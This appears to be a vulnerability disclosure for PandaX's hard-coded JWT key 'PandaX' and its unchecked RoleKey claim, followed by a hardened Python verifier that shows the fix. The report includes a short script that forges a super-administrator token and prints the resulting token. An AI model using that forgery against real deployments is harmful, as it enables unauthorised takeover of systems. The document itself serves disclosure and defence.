[Vulnerability] PandaX JWT_SECRET HardCoded #9
Description
Version
Before commit fb8ff40 (as of December 10, 2025)
Problem description
PandaX uses a hard-coded JWT signing key, and the claim-validation logic in its authentication mechanism is insecure, allowing attackers to easily forge super-administrator credentials and take over the entire system.
Screenshots or logs
https://github.com/PandaXGO/PandaX/blob/master/config.yml#L27C8-L27C14
In the official deployment configuration, the default key at this line is PandaX.
To reproduce
With the default configuration, the JWT signing key of a deployed system is PandaX. This can be verified with online JWT tools.
Meanwhile, through black-box testing, we discovered that the system did not perform any validity checks on the incoming JWT, not even on its validity period. It considered the incoming RoleKey to be valid, making the attack very simple.
```python
import jwt  # PyJWT


def generate_jwt():
    # Default signing key shipped in config.yml
    secret = "PandaX"
    # The server trusts this claim as-is, so no other claims (e.g. exp) are needed
    payload = {
        "RoleKey": "admin",
    }
    token = jwt.encode(payload, secret, algorithm="HS256")
    return token


if __name__ == "__main__":
    token = generate_jwt()
    print("JWT:")
    print(token)
```
Running the script yields the forged super-administrator credential:

```text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJSb2xlS2V5IjoiYWRtaW4ifQ.xuhLi3o2P7fDdHG5CPHbzMuBlGYattCQHFmBnT-ltwY
```
The fact that our forged credential passed the server's verification shows that we obtained super-administrator privileges and directly took over the entire system, which makes the system's authentication highly insecure.
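To make the missing checks concrete, here is an added, stdlib-only Python verifier written for this issue; it is not PandaX's code (PandaX is a Go project) and not taken from the report. It applies every control the report says was absent: it refuses to run on the shipped default key, pins the algorithm, checks the HMAC in constant time, requires an expiry, and resolves the role from a server-side user store instead of trusting a RoleKey claim. The constants STRONG_SECRET, MIN_SECRET_LEN and USER_ROLES, and the function names issue_token and verify_token, are constructed assumptions for the example; PAGE_TOKEN is the forged token quoted above.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

# Default signing key shipped in PandaX's config.yml, as quoted in the report.
DEFAULT_SECRET = "PandaX"

# Forged token from the report: header {"alg":"HS256","typ":"JWT"}, payload {"RoleKey":"admin"}.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJSb2xlS2V5IjoiYWRtaW4ifQ."
    "xuhLi3o2P7fDdHG5CPHbzMuBlGYattCQHFmBnT-ltwY"
)

# Constructed placeholder; a real deployment loads the key from the environment or a secret store.
STRONG_SECRET = "constructed-example-secret-0123456789abcdef"
MIN_SECRET_LEN = 32  # assumed policy for this example, not a PandaX setting

# Constructed stand-in for the server-side user store. Authorisation is derived from
# the subject id looked up here; any RoleKey claim inside the token is ignored.
USER_ROLES = {"1001": "admin", "2002": "user"}


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()


def issue_token(secret: str, sub: str, ttl_seconds: int = 3600, now: Optional[int] = None) -> str:
    """Mint an HS256 token that always carries a subject id and a short expiry."""
    now = int(time.time()) if now is None else now
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    claims = {"sub": sub, "iat": now, "exp": now + ttl_seconds}
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = sign_hs256(f"{header}.{payload}".encode("ascii"), secret)
    return f"{header}.{payload}.{b64url_encode(signature)}"


def verify_token(token: str, secret: str, now: Optional[int] = None) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, role), applying the checks the report found missing."""
    now = int(time.time()) if now is None else now
    # 1. Refuse to operate on the shipped default key (or any short key) at all.
    if secret == DEFAULT_SECRET or len(secret) < MIN_SECRET_LEN:
        return False, "default or weak secret", None
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed token", None
    head_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(head_b64))
        payload = json.loads(b64url_decode(body_b64))
        signature = b64url_decode(sig_b64)
        signing_input = f"{head_b64}.{body_b64}".encode("ascii")
    except ValueError:  # base64, JSON and codec errors all derive from ValueError
        return False, "malformed token", None
    # 2. Pin the algorithm server-side; the header never gets to choose (e.g. "none").
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False, "unexpected algorithm", None
    # 3. Constant-time signature comparison.
    if not hmac.compare_digest(sign_hs256(signing_input, secret), signature):
        return False, "bad signature", None
    if not isinstance(payload, dict):
        return False, "malformed payload", None
    # 4. An expiry claim is mandatory and must still be in the future.
    exp = payload.get("exp")
    if not isinstance(exp, int) or now >= exp:
        return False, "missing or expired exp", None
    # 5. The role comes from the user store keyed by subject, never from the token.
    sub = payload.get("sub")
    if not isinstance(sub, str) or sub not in USER_ROLES:
        return False, "unknown subject", None
    return True, "ok", USER_ROLES[sub]


if __name__ == "__main__":
    print("report's token, default secret:", verify_token(PAGE_TOKEN, DEFAULT_SECRET))
    print("report's token, strong secret: ", verify_token(PAGE_TOKEN, STRONG_SECRET))
    good = issue_token(STRONG_SECRET, "1001", ttl_seconds=60)
    print("properly issued token:          ", verify_token(good, STRONG_SECRET))
```

Run stand-alone, the script shows the report's token being rejected twice (once because the default key is refused outright, once as a bad signature under a real key) and a freshly issued token for subject 1001 being accepted with the role taken from USER_ROLES. The same five checks map onto whatever JWT library the Go service uses: the fix is in how the verifier is configured (key source, pinned algorithm, required exp, server-side role lookup), not in the token format.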